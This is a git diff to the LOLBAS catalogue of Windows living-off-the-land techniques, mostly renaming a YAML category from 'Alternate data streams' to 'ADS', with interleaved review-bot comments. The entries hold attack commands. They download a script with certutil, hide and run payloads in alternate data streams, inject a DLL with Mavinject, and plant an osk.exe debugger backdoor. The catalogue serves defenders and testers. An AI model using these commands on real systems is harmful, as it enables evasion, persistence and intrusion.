diff --git a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
index d4657fa..e030eb6 100644
--- a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
+++ b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
@@ -3,7 +3,10 @@
 #Author: Oddvar Moe
 #If you can use it, be my guest!
-$mainpath = "C:\data\gitprojects\LOLBAS"
+# Install-Module powershell-yaml
+# import-module powershell-yaml
+
+$mainpath = "C:\LOLBAS"
 function Convert-YamlToMD
diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml
index dbc58da..3e58b92 100644
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
 Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml
index 4a1b4a9..276fe0a 100644
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@@ -15,7 +15,7 @@ Commands:
 - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
 Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
 Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1105
 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
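Review bot: The powershell-yaml dependency is recorded only in the two commented-out lines `# Install-Module powershell-yaml` and `# import-module powershell-yaml` added above `$mainpath`, so on a machine without the module the script presumably fails later, when the YAML cmdlets are first called, rather than at startup. A `#Requires -Modules powershell-yaml` directive at the top of the script makes PowerShell refuse to start with a clear message when the module is missing, and the install comment should name the version the generator was tested with (`Install-Module powershell-yaml -RequiredVersion <tested version>`) so every contributor pulls the same code from the PowerShell Gallery. The new `$mainpath = "C:\LOLBAS"` is still a hard-coded local checkout path; a `param([string]$MainPath = "C:\LOLBAS")` block as the script's first statement would keep this default while letting others point it at their own clone without editing the file. The hunk ends at the `function Convert-YamlToMD` line, whose body lies outside the diff.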
diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml
index f22db61..155fc98 100644
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: control.exe c:\windows\tasks\file.txt:evil.dll
 Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
 Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1196
 MitreLink: https://attack.mitre.org/wiki/Technique/T1196
diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml
index a00b7e3..5ee0143 100644
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: cscript c:\ads\file.txt:script.vbs
 Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
 Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml
index bc3938d..e61c99c 100644
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@@ -15,7 +15,7 @@ Commands:
 - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
 Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
 Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@@ -23,7 +23,7 @@ Commands:
 - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
 Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
 Usecase: Extract hidden file within alternate data streams
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@@ -31,7 +31,7 @@ Commands:
 - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
 Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
 Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml
index fc2a4d5..42fcf2a 100644
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@@ -23,7 +23,7 @@ Commands:
 - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
 Description: Copies source file to destination Alternate Data Stream (ADS)
 Usecase: Copies files from A to B
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml
index 42f8bc9..9f2552c 100644
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
 Usecase: Extract data from cab file and hide it in an alternate data stream.
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@@ -15,7 +15,7 @@ Commands:
 - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
 Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
 Usecase: Extract data from cab file and hide it in an alternate data stream.
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml
index e8731af..f44b00a 100644
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
 Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
 Usecase: Add a file to an alternate data stream to hide from defensive counter measures
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@@ -15,7 +15,7 @@ Commands:
 - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
 Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
 Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml
index 81dbe0c..2e3abb8 100644
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@@ -15,7 +15,7 @@ Commands:
 - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
 Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
 Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml
index 5f73075..9fb67b5 100644
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
 Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
 Usecase: Hide data compressed into an alternate data stream
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml
index 012df46..09bc4e8 100644
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@@ -15,7 +15,7 @@ Commands:
 - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
 Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
 Usecase: Inject dll file into running process
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml
index 9cb16a9..9790a47 100644
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@@ -31,7 +31,7 @@ Commands:
 - Command: mshta.exe "C:\ads\file.txt:file.hta"
 Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
 Usecase: Execute code hidden in alternate data stream
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1170
 MitreLink: https://attack.mitre.org/wiki/Technique/T1170
diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml
index 84be934..6535861 100644
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
 Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
 Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml
index 28e46d0..57c46f2 100644
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
 Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
 Usecase: Hide/plant registry information in Alternate data stream for later use
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml
index eb3f1d2..a410cda 100644
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
 Description: Export the target Registry key to the specified .REG file.
 Usecase: Hide registry data in alternate data stream
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@@ -15,7 +15,7 @@ Commands:
 - Command: regedit C:\ads\file.txt:regfile.reg"
 Description: Import the target .REG file into the Registry.
 Usecase: Import hidden registry data from alternate data stream
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml
index 3778572..b924953 100644
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
 Description: Creates a new service and executes the file stored in the ADS.
 Usecase: Execute binary file hidden inside an alternate data stream
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml
index 0316208..133e753 100644
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
 Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
 Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
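Review bot: The context line `- Command: regedit C:\ads\file.txt:regfile.reg"` in Regedit.yml's `@@ -15,7 +15,7 @@` hunk carries an unbalanced trailing `"`, which the commit leaves in place while changing the Category line in the same hunk. Since this entry is already being edited, dropping that character, `- Command: regedit C:\ads\file.txt:regfile.reg`, would make it consistent with the export command in the preceding hunk and with the other unquoted Command values in this diff. That the quote is a typo is inferred from the visible lines only; if it is intentional, a short note on the entry would spare the next reader the same question.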
@@ -20,7 +20,7 @@ Commands:
 MitreID: T1218
 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- - Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
+ - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
 Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
 Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
 Category: Execute
diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml
index 144d221..8fcb842 100644
--- a/yml/OSBinaries/Wscript.yml
+++ b/yml/OSBinaries/Wscript.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: wscript c:\ads\file.txt:script.vbs
 Description: Execute script stored in an alternate data stream
 Usecase: Execute hidden code to evade defensive counter measures
- Category: Alternate data streams
+ Category: ADS
 Privileges: User
 MitreID: T1096
 MitreLink: https://attack.mitre.org/wiki/Technique/T1096